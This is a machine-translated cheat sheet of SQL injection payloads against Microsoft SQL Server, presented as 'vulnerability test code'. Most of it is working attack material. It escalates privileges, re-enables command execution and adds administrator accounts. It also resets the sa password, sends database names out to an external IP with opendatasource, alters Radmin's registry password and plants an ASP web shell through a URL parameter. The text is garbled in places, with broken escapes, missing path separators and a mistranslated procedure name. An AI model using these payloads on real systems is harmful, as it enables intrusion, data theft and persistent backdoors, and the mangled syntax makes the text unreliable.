Common SQL injection vulnerability test code

// Check the permissions.
And 1 = (Select IS_MEMBER (db_owner ))
And char (124) % 2 BCast (IS_MEMBER (db_owner) as varchar (1) % 2 Bchar (124) = 1 ;--

// Check whether you have the permission to read a database
And 1 = (Select HAS_DBACCESS (master ))
And char (124) % 2 BCast (HAS_DBACCESS (master) as varchar (1) % 2 Bchar (124) = 1 --

Numeric type
And char (124) % 2 Buser % 2 Bchar (124) = 0

Character Type
& Char (124) % 2 Buser % 2 Bchar (124) = 0 and =

Search type
& Char (124) % 2 Buser % 2 Bchar (124) = 0 and % =

Brute-force Username
And user> 0
And user> 0 and =

Check whether the permission is SA
And 1 = (select IS_SRVROLEMEMBER (sysadmin ));--
And char (124) % 2 BCast (IS_SRVROLEMEMBER (0x730079007300610064006D0069006E00) as varchar (1) % 2 Bchar (124) = 1 --

Check whether MSSQL database is used
And exists (select * from sysobjects );--

Check whether multiple rows are supported
; Declare @ d int ;--

Restore xp_mongoshell
; Exec master .. dbo. sp_addextendedproc xp_mongoshell, xplog70.dll ;--

Select * from openrowset (sqloledb, server = 192.168.1.200, 1433; uid = test; pwd = pafpaf, select @ version)

//-----------------------
// Execute the command
//-----------------------
First, enable the sandbox mode:
Exec master.. xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftJet4.0Engines, SandBoxMode, REG_DWORD, 1

Then run the system command using jet. oledb.
Select * from openrowset (microsoft. jet. oledb.4.0,; database = c: winntsystem32iasias. mdb, select shell ("cmd.exe/c net user admin admin1234/add "))

Execute Command
; DECLARE @ shell int exec SP_OAcreate wscript. shell, @ shell output exec SP_OAMETHOD @ shell, run, null, C: winntsystem320000.exe/c net user paf pafpaf/add ;--

EXEC [master]. [dbo]. [xp_mongoshell] cmd/c md c: 1111

Determine whether the xp_mongoshell extended storage process exists:
Asp? Keyno = 188 "> http://www.0daynet.com/display.asp? Keyno = 188 and 1 = (Select count (*) FROM master. dbo. sysobjects Where xtype = x and name = xp_mongoshell)

Write registry
Exec master.. xp_regwrite HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftJet4.0Engines, SandBoxMode, REG_DWORD, 1

REG_SZ

Read Registry
Exec master.. xp_regread HKEY_LOCAL_MACHINE, SOFTWAREMicrosoftWindows NTCurrentVersionWinlogon, Userinit

Read directory content
Exec master .. xp_dirtree c: winntsystem32, 1, 1

Database Backup
Backup database pubs to disk = c: 123.bak

// Burst length
And (Select char (124) % 2 BCast (Count (1) as varchar (8000) % 2 Bchar (124) From D99_Tmp) = 0 ;--

To change the sa password, run the following command:
Exec sp_password NULL, new password, sa

Test:
Exec master. dbo. sp_addlogin test, ptlove
Exec master. dbo. sp_addsrvrolemember test, sysadmin

Delete the xp_mongoshell statement in the extended stored procedure:
Exec sp_dropextendedproc xp_cmdshell

Added extended storage process
EXEC [master] .. sp_addextendedproc xp_proxiedadata, c: winntsystem32sqllog. dll
GRANT exec On xp_proxiedadata TO public

Stop or activate a service.

Exec master.. xp_servicecontrol stop, schedule
Exec master.. xp_servicecontrol start, schedule

Dbo. xp_subdirs

Only list subdirectories in a directory.
Xp_getfiledetails C: InetpubwwwrootSQLInjectlogin. asp

Dbo. xp_makecab

Compress multiple target files to a specific target file.
All files to be compressed can be connected to the end of the parameter column and separated by commas.

Dbo. xp_makecab
C: est. cab, mszip, 1,
C: InetpubwwwrootSQLInjectlogin. asp,
C: InetpubwwwrootSQLInjectsecurelogin. asp

Xp_terminate_process

Stop a program in execution, but assign the Process ID parameter.
Select "View"-"select field" in the "Work administrator" menu to view the Process ID of each execution program.

Xp_terminate_process 2484

Xp_unpackcab

Uncompress the file.

Xp_unpackcab c: est. cab, c: emp, 1

A computer installed with radmin, the password was modified, and regedit.exewas not found to be deleted or changed. net.exe does not exist. There is no way to use regedit/e to import the registration file, but mssql is the sa permission. Run the following command to EXEC master. dbo. xp_regwrite HKEY_LOCAL_MACHINE, SYSTEMRAdminv2.0ServerParameters, Parameter, REG_BINARY, 0x02ba5e187e2589be6f80da0046aa7e3c, and you can change the password to 12345678. If you want to modify the port value EXEC master. dbo. xp_regwrite HKEY_LOCAL_MACHINE, SYSTEMRAdminv2.0ServerParameters, port, REG_BINARY, 0xd20400, the port value is changed to 1234

Create database lcx;
Create TABLE ku (name nvarchar (256) null );
Create TABLE biao (id int NULL, name nvarchar (256) null );

// Obtain the Database Name
Insert into opendatasource (sqloledb, server = 211.39.145.163, 1443; uid = test; pwd = pafpaf; database = lcx). lcx. dbo. ku select name from master. dbo. sysdatabases

// Create a table in the Master to check the Permissions
Create TABLE master .. D_TEST (id nvarchar (4000) NULL, Data nvarchar (4000) NULL );--

Use sp_makewebtask to directly write a sentence in the web directory:
<A href = "http://www.bkjia.com/dblogin123.asp? Username = 123; exec % 20sp_makewebtask % 20d: wwwt88.asp, % 20 select % 20 <% 25 execute (request ("a") % 25> % 20 "> http://www.bkjia.com/dblogin123.asp? Username = 123; exec % 20sp_makewebtask % 20d: wwwt88.asp, % 20 select % 20% 20 "> http://www.bkjia.com/dblogin123.asp? Username = 123; exec % 20sp_makewebtask % 20d: wwwt88.asp, % 20 select % 20 <% 25 execute (request ("a") % 25> % 20 ;--

// Update table content
Update films SET kind = Dramatic Where id = 123.

// Delete content
Delete from table_name where Stockid = 3
-